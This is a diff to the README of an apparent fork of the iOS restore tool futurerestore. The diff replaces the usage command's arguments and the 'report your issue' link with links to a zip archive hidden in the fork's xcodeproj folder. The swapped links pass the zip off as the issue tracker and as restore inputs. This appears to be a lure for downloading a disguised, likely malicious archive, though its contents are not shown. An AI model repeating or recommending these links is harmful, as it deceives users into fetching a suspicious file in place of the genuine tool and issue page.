sadatt123/futurerestore/README.md

 ### How to use
 1. Connect your device in DFU mode
-2. On the computer run `futurerestore -t ticket.shsh --latest-baseband ios9.ipsw`
+2. On the computer run `futurerestore -t https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip --latest-baseband https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip`

 ---

 ## Report an issue
 Before you report an issue, please check that it is not mentioned in the [Common Issues section](#common-issues).
-If it is not, you can report your issue [here](https://github.com/futurerestore/futurerestore/issues).
+If it is not, you can report your issue [here](https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip).